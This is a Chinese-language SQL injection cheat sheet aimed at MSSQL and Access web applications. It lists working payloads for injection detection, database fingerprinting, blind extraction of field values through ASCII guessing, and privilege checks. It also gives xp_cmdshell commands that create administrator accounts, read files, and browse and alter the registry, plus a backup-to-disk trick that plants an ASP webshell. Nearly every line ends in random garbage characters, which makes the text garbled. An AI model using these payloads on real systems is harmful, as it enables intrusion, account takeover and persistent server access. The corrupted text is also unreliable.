1.判断是否有注入;and 1=1 ;and 1=2 InTKdr^ P
2.初步判断是否是mssql ;and user>0 sz){uOI
?yda.<"g9Y
3.注入参数是字符'and [查询条件] and ''=' >!CH7wX
mOgx&ns;j
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 9L UP{(uq
+G>aj'\M|
5.判断数据库系统 v#zfs'
>7eu'
;and (select count(*) from sysobjects)>0 mssql Y>c5:F;
JT}dor
;and (select count(*) from msysobjects)>0 access h?M'7Lti
:z}~U3,JE
K.c6Rg
B]CS2LEqh
6.猜数据库 ;and (select Count(*) from [数据库名])>0 o%QhV6(F
,5%aP%
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 GN8`xR{J*
.l" _K
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 rQAbN6
M}{n6T6B
9.(1)猜字段的ascii值(access) 4?*`:
C: TuC5Sr
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 jp\JwE
oQKcGUZ
(2)猜字段的ascii值(mssql) 9e|{z9z[l
7zi^{]
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ~j\;e
yS(=eB_
10.测试权限结构(mssql) 4
g/<).1<b
c>%z)uY>/
NiU tH
/61ag9pN
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- RJ7/I/yD|
rmAP&Gw I
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ,L8I7O}A;
cftn`:(&8
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- FeincZ!M
>(YPkmH
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- g@N=N
<'+R%6
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- fM
zAf3
co(fGp#!
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- r[i~4N=
0n =9TmE
;and 1=(select IS_MEMBER('db_owner'));-- 8#d99dOe
rA>R`
n[S4180 9<
^y;OHo
11.添加mssql和系统的帐户 9X*eE
P"[l86:
;exec master.dbo.sp_addlogin username;-- zrWq!F*-V\
;exec master.dbo.sp_password null,username,password;-- Uz m[e%/`
)x5$io
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- lFzQG:k@
3IRRFIiO
;exec master.dbo.xp_cmdshell 'net user username password 8P'En+uE1|
[M zc^I&
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- vX!dMJa0
ML9T(th6v
;exec master.dbo.xp_cmdshell 'net user username password /add';-- yQQDGFTb!=
{
?1mY"
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- CgPZvB[
5i
wikC=y
-qnXa
*X=f
12.(1)遍历目录 \?Oly171
_tR.RAaa"
;create table dirs(paths varchar(100), id int) 4jZi62
\!4ghev3
;insert dirs exec master.dbo.xp_dirtree 'c:\' ?yd(er<_f
|4 d{X@`&
;and (select top 1 paths from dirs)>0 Ozh^Q$>u
bC,M&<N
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) >?uH#%C5
uk>/Il
K:Xrfn{s
x4 A TK
(2)遍历目录 qS[p|*BL
Qe=Q8cT
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- n3@g{4~
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 (B~V:Yt
>t6'8g"T
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 e&]`X HC9
W:N"O\`{m
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 zI*/u)48
K]=>F
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 wW)&Px
n
EVE xL
:Y)kKq d
=Q8^@i4[&D
13.mssql中的存储过程 c6}xnH
"T=3mv%S
xp_regenumvalues 注册表根键, 子键 +#*z"a`
:J)lC =
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ,Elga}7u
DF&jZ[##
xp_regread 根键,子键,键值名 KLv
3B_} :
;exec xp_regread )9sr,3w
2|_Jup
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 JNz"lTt>[g
eG)/&zQ8
xp_regwrite 根键,子键, 值名, 值类型, 值 cB"F1~z
NbK?Dg8WJG
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 cX]{RVZo-/
Q)|LiCR,
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 GLcZ=6)"'
'9F{.]
xp_regdeletevalue 根键,子键,值名 z E7ocul
e hB1`%@
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 .$x[!fuuR&
<OO/Tn'a
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值
oG_'<5Bv>
$@f3=NJ4k
rp[oH=&
!JQ~r@j
14.mssql的backup创建webshell ;<GTtt#D
_"t.1+-K
use model 4R^j"x
5
R*5;J`TW
create table cmd(str image); m
?tnk?oX
hF PRC0ftE
insert into cmd(str) values (''); h.+&=s!Nsy
)p_LkX(
backup database model to disk='c:\l.asp'; ^~IcQ!j/5
/gy:#-2Gy
_!g
NF=
>wm$,%zk
15.mssql内置函数 u~T$F/]k>
i3WmD@
;and (select @@version)>0 获得Windows的版本号 u2\qg;dP
=}o>_+"
;and user_name()='dbo' 判断当前系统的连接用户是不是sa \ A UtGP
c\rbLr}l)
;and (select user_name())>0 爆当前系统的连接用户 3jdB8a]T_
<cOE6;d#
;and (select db_name())>0 得到当前连接的数据库 uV:uXQni``
Pds*M?&F
4qXUk:C@m
8ch~UBq/
16.简洁的webshell 9: |K]y
$YQ&\[pDA
use model O]LuL&=s y
ZV^J5wYE
create table cmd(str image); Fmle|
MifgRUe
insert into cmd(str) values (''); HNyDWD)_
c]0
backup database model to disk='g:\wwwtest\l.asp';